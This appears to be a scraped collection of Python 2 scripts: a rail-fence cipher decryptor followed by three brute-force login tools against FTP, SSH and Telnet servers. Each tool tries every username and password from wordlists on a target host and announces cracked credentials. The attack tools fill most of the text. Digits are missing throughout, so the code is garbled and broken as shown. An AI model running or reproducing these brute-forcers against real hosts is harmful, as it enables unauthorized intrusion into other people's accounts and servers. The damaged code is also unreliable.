#!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input(‘请输入要解密的字符串 ‘) elen = len(e) field=[] for i in range(,elen): if(elen%i==): field.append(i) for f in field: b = elen / f result = {x:‘‘ for x in range(b)} for i in range(elen): a = i % b; result.update({a:result[a] + e[i]}) d = ‘‘ for i in range(b): d = d + result[i] print ‘分为 ‘+str(f)+‘ ‘+‘栏时,解密结果为: ‘+d
#!/usr/bin/env python #-*-coding = utf--*- #author:@xfk #date:@-- import sys, os, time from ftplib import FTP docs = """ [*] This was written for educational purpose and pentest only. Use it at your own risk. [*] Author will be not responsible for any damage! [*] Toolname : [*] Coder : [*] Version : . [*] eample of use : python -t -u usernames.txt -p passwords.txt """ if sys.platform == 'linux' or sys.platform == 'linux': clearing = 'clear' else: clearing = 'cls' os.system(clearing) R = "[m"; G = "[m"; Y = "[m" END = "[m" def logo(): print G+" |---------------------------------------------------------------|" print " | |" print " | |" print " | // v.. |" print " | FTP Brute Forcing Tool |" print " | |" print " |---------------------------------------------------------------| " print " [-] %s " % time.strftime("%X") print docs+END def help(): print R+"[*]-t, --target ip/hostname <> Our target" print "[*]-u, --usernamelist usernamelist <> usernamelist path" print "[*]-p, --passwordlist passwordlist <> passwordlist path" print "[*]-h, --help help <> print this help" print "[*]Example : python ftp_bf -t -u username.txt -p passwords.txt"+END sys.exit() def bf_login(hostname,username,password): # sys.stdout.write("[!]Checking : %s " % (p)) # sys.stdout.flush() try: ftp = FTP(hostname) ftp.login(hostname,username, password) ftp.retrlines('list') ftp.quit() print Y+" [!] wt,wt!!! We did it ! " print "[+] Target : ",hostname, "" print "[+] User : ",username, "" print "[+] Password : ",password, ""+END return # sys.exit() except Exception, e: pass except KeyboardInterrupt: print R+" [-] Exiting ... "+END sys.exit() def anon_login(hostname): try: print G+" [!] Checking for anonymous login. "+END ftp = FTP(hostname) ftp.login() ftp.retrlines('LIST') print Y+" [!] wt,wt!!! Anonymous login successfuly ! "+END ftp.quit() except Exception, e: print R+" [-] Anonymous login failed... "+END pass def main(): logo() try: for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-u' or arg.lower() == '--usernamelist': usernamelist = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-p' or arg.lower() == '--passwordlist': passwordlist = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-h' or arg.lower() == '--help': help() elif len(sys.argv) <= : help() except: print R+"[-]Cheak your parametars input "+END help() print G+"[!] BruteForcing target ..."+END anon_login(hostname) # print "here is ok" # print hostname try: usernames = open(usernamelist, "r") user = usernames.readlines() count = while count < len(user): user[count] = user[count].strip() count += except: print R+" [-] Cheak your usernamelist path "+END sys.exit() # print "here is ok ",usernamelist,passwordlist try: passwords = open(passwordlist, "r") pwd = passwords.readlines() count = while count < len(pwd): pwd[count] = pwd[count].strip() count += except: print R+" [-] Check your passwordlist path "+END sys.exit() print G+" [+] Loaded:",len(user),"usernames" print " [+] Loaded:",len(pwd),"passwords" print "[+] Target:",hostname print "[+] Guessing... "+END for u in user: for p in pwd: result = bf_login(hostname,u.replace(" ",""),p.replace(" ","")) if result != : print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END else: print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END if not result : print R+" [-]There is no username ans password enabled in the list." print "[-]Exiting... "+END if __name__ == "__main__": main()
#!/usr/bin/env python #-*-coding = UTF--*- #author@:dengyongkai import sys import os import time #from threading import Thread try: from paramiko import SSHClient from paramiko import AutoAddPolicy except ImportError: print G+''' You need paramiko module. Debian/Ubuntu: sudo apt-get install aptitude : sudo aptitude install python-paramiko '''+END sys.exit() docs = """ [*] This was written for educational purpose and pentest only. Use it at your own risk. [*] Author will be not responsible for any damage! [*] Toolname : [*] Author : xfk [*] Version : v.. [*] Example of use : python [-T target] [-P port] [-U userslist] [-W wordlist] [-H help] """ if sys.platform == 'linux' or sys.platform == 'linux': clearing = 'clear' else: clearing = 'cls' os.system(clearing) R = "[m"; G = "[m"; Y = "[m" END = "[m" def logo(): print G+" |---------------------------------------------------------------|" print " | |" print " | |" print " | // v.. |" print " | SSH Brute Forcing Tool |" print " | |" print " |---------------------------------------------------------------| " print " [-] %s " % time.ctime() print docs+END def help(): print Y+" [*]-H --hostname/ip <>the target hostname or ip address" print " [*]-P --port <>the ssh service port(default is )" print " [*]-U --usernamelist <>usernames list file" print " [*]-P --passwordlist <>passwords list file" print " [*]-H --help <>show help information" print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END sys.exit() def BruteForce(hostname,port,username,password): ''' Create SSH connection to target ''' ssh = SSHClient() ssh.set_missing_host_key_policy(AutoAddPolicy()) try: ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False) status = 'ok' ssh.close() except Exception, e: status = 'error' pass return status def makelist(file): ''' Make usernames and passwords lists ''' items = [] try: fd = open(file, 'r') except IOError: print R+'unable to read file '%s'' % file+END pass except Exception, e: print R+'unknown error'+END pass for line in fd.readlines(): item = line.replace(' ', '').replace('', '') items.append(item) fd.close() return items def main(): logo() # print "hello wold" try: for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = str(sys.argv[int(sys.argv[:].index(arg))+]) if arg.lower() == '-p' or arg.lower() == '--port': port = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-u' or arg.lower() == '--userlist': userlist = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-h' or arg.lower() == '--help': help() elif len(sys.argv) <= : help() except: print R+"[-]Cheak your parametars input "+END help() print G+" [!] BruteForcing target ... "+END # print "here is ok" # print hostname,port,wordlist,userlist usernamelist = makelist(userlist) passwordlist = makelist(wordlist) print Y+"[*] SSH Brute Force Praparing." print "[*] %s user(s) loaded." % str(len(usernamelist)) print "[*] %s password(s) loaded." % str(len(passwordlist)) print "[*] Brute Force Is Starting......."+END try: for username in usernamelist: for password in passwordlist: print G+" [+]Attempt uaername:%s password:%s..." % (username,password)+END current = BruteForce(hostname, port, username, password) if current == 'error': print R+"[-]O*O The username:%s and password:%s Is Disenbabled... " % (username,password)+END # pass else: print G+" [+] ^-^ HaHa,We Got It!!!" print "[+] username: %s" % username print "[+] password: %s " % password+END # sys.exit() except: print R+" [-] There Is Something Wrong,Pleace Cheak It." print "[-] Exitting..... "+END raise print Y+"[+] Done.^-^ "+END sys.exit() if __name__ == "__main__": main()
#!usr/bin/python #Telnet Brute Forcer # #dhydr[at]gmail[dot]com import threading, time, random, sys, telnetlib from copy import copy if len(sys.argv) !=: print "Usage: ./ <server> <userlist> <wordlist>" sys.exit() try: users = open(sys.argv[], "r").readlines() except(IOError): print "Error: Check your userlist path " sys.exit() try: words = open(sys.argv[], "r").readlines() except(IOError): print "Error: Check your wordlist path " sys.exit() print " dhydr[at]gmail[dot]com TelnetBruteForcer v." print " -------------------------------------------------- " print "[+] Server:",sys.argv[] print "[+] Users Loaded:",len(users) print "[+] Words Loaded:",len(words)," " wordlist = copy(words) def reloader(): for word in wordlist: words.append(word) def getword(): lock = threading.Lock() lock.acquire() if len(words) != : value = random.sample(words, ) words.remove(value[]) else: print " Reloading Wordlist - Changing User " reloader() value = random.sample(words, ) users.remove(users[]) lock.release() if len(users) ==: return value[][:-], users[] else: return value[][:-], users[][:-] class Worker(threading.Thread): def run(self): value, user = getword() try: print "-"* print "User:",user,"Password:",value tn = telnetlib.Telnet(sys.argv[]) tn.read_until("login: ") tn.write(user + " ") if password: tn.read_until("Password: ") tn.write(value + " ") tn.write("ls ") tn.write("exit ") print tn.read_all() print " Login successful:",value, user tn.close() work.join() sys.exit() except: pass for I in range(len(words)*len(users)): work = Worker() work.start() time.sleep()</wordlist></userlist></server>